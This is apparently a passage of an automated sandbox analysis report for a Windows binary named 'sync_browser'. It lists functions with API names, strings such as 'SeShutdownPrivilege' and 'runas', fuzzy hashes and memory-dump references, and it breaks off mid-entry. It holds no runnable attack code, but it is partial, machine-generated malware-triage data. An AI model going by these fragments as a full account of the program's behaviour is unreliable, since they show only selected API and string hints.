                                                                      • Instruction ID: 7c6d3f5391a9b079b3d0208db66bbf9e81a0a4c4aec631e66c1cccd55cda9593
                                                                      • Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                      • Instruction Fuzzy Hash: AD21153651CB4A92E760AF14F4A07AAF364FB84754FC01136E68D47A59DF3CD154CB11
                                                                      Function 00007FF7E50A1660 Relevance: 12.3, APIs: 8, Instructions: 292windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$RectVisible$Foreground
                                                                      • String ID:
                                                                      • API String ID: 2499709836-0
                                                                      • Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                      • Instruction ID: b091fbb526b79ea474736280845ad2cec64ec80ae1070b4f1466b06f20db922b
                                                                      • Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                      • Instruction Fuzzy Hash: DAD1BE32B086958EEB14DFB9E0506EC77B2BB48B88B50453AEE0DA7B4CDF349441C761
                                                                      Function 00007FF7E5083550 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 337752880-3733053543
                                                                      • Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                      • Instruction ID: a075996f976d3a68ee88ab67ea717a22a290065e324fc5aab33529d55c437c38
                                                                      • Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                      • Instruction Fuzzy Hash: F3116371918B4685E760EB20F8657AAF3A0FB84F45FC01036E58E87A58DF7CD049CB11
                                                                      Function 00007FF7E5083E20 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExecuteFileForegroundModuleNameShellVersionWindow
                                                                      • String ID: -softwarecad$p$runas
                                                                      • API String ID: 397093096-2208381721
                                                                      • Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                      • Instruction ID: 2c99361622b97b7a108beb4b7a441968e7debabda6dc46e052365c39645098ea
                                                                      • Opcode Fuzzy Hash: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
                                                                      • Instruction Fuzzy Hash: 7F11FA35518B8585E770AB10F4A839AB3A0FB88B45F800236D68D42B58EF7CD148CB11
                                                                      Function 00007FF7E5127220 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3778485334-0
                                                                      • Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                      • Instruction ID: 61ad7c7f7ef6442528be010223ba7332613bcace77553bf322cfaa08734ef592
                                                                      • Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                      • Instruction Fuzzy Hash: 2B311D3590CB8A85E760BB55F8603A9B3A0FB44B54F901037D58D87769EF7CE444CB22
                                                                      Function 00007FF7E5075910 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$FindFirstModuleName
                                                                      • String ID: *.dsm
                                                                      • API String ID: 1519589655-1970359449
                                                                      • Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                      • Instruction ID: 320da5a49b54d6e4cad4dbb97f4e2fd0260a4b3ebf466b983ab64b51e3d1db61
                                                                      • Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                      • Instruction Fuzzy Hash: 7731452560868995EB60AB34B8543FBA390FB48BB4F805336DA7D836D8EE3CD505C711
                                                                      Function 00007FF7E50C77F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$FileModuleNameQueryValue
                                                                      • String ID: UseRegistry$admin$admin_auth
                                                                      • API String ID: 1028385882-3376419731
                                                                      • Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                      • Instruction ID: 377e16779f643257df692fd2b7d6d841aca463f758e09a2badd70a901618d0b7
                                                                      • Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                      • Instruction Fuzzy Hash: A2215631618A4AC1EB60DB20F8647AAB3A0FB89B94FC01036FA4D83B58DF3DD545CB51
                                                                      Function 00007FF7E50C7750 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close$FileModuleNamePrivateProfile
                                                                      • String ID: UseRegistry$admin
                                                                      • API String ID: 3032973919-2802730080
                                                                      • Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                      • Instruction ID: b89a1c1252df8805c41515d19df1289bff6a9518ccdd328b58b09dc1be3b90ad
                                                                      • Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                      • Instruction Fuzzy Hash: A8010825A19A0A81FE62BB24F8743B9A360FF89F54FC01137D90E82568DF3CE514C672
                                                                      Function 00007FF7E51347E4 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                      • Instruction ID: ce527f5dcef28025c71df4e93ff6693ea36b51458934c53bb3826c190ba64891
                                                                      • Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
                                                                      • Instruction Fuzzy Hash: E9318732618B8685D720DF25F8643AEB3A0FB84B54F910136EA9D83B58DF7CC545CB11
                                                                      Function 00007FF7E50A48B0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Iconic
                                                                      • String ID: 0
                                                                      • API String ID: 110040809-4108050209
                                                                      • Opcode ID: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                                      • Instruction ID: 245091ea8fe2d6400510e1dbc0eef2c19294d864ed650804f8a58f07779d6a39
                                                                      • Opcode Fuzzy Hash: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
                                                                      • Instruction Fuzzy Hash: 4AA1AB366042858BE7589F39D5507ACF7E0FB48F54F54803AEB49C7289DB38E864CB22
                                                                      Function 00007FF7E50C7D50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E507D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7E507D3BB
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7D89
                                                                        • Part of subcall function 00007FF7E50C7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7689
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C76DD
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C7722
                                                                        • Part of subcall function 00007FF7E50C78E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C792E
                                                                        • Part of subcall function 00007FF7E50C78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C796A
                                                                        • Part of subcall function 00007FF7E50C78E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C79B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$CreateQueryValue$FileModuleName
                                                                      • String ID: UseRegistry$admin$group3
                                                                      • API String ID: 1728753321-3776872688
                                                                      • Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                      • Instruction ID: 7bbdcdc64745bc88db493a489ba394dfcce9c96eedf9904d90e38c23dda334e5
                                                                      • Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
                                                                      • Instruction Fuzzy Hash: 8C111225E1854A81EA61FB34F4713F9A360FF89B44FC00037E64D8666ADE3CE104CB61
                                                                      Function 00007FF7E50C7EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E507D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7E507D3BB
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7EED
                                                                        • Part of subcall function 00007FF7E50C7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7689
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C76DD
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C7722
                                                                        • Part of subcall function 00007FF7E50C77F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7840
                                                                        • Part of subcall function 00007FF7E50C77F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C787D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$Create$FileModuleNameQueryValue
                                                                      • String ID: UseRegistry$admin$locdom2
                                                                      • API String ID: 1788981264-80830018
                                                                      • Opcode ID: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                                      • Instruction ID: a52a83173d50123e7d4f167381442a9382a4988487f21ea5ea1440b55f502b1e
                                                                      • Opcode Fuzzy Hash: 453e7d21788d8a281cd3351b72fc90b6b80e6296ed96c2d368ba72f2aba873be
                                                                      • Instruction Fuzzy Hash: 51017125E1854E81FA21FB34B4B53BA9391EF99B04FC00437E50DC559ADE3CE105C672
                                                                      Function 00007FF7E50C7E10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7E507D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7E507D3BB
                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7E50
                                                                        • Part of subcall function 00007FF7E50C7650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7689
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C76DD
                                                                        • Part of subcall function 00007FF7E50C7650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7E50C7722
                                                                        • Part of subcall function 00007FF7E50C77F0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7E50C7840
                                                                        • Part of subcall function 00007FF7E50C77F0: RegQueryValueExA.ADVAPI32 ref: 00007FF7E50C787D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
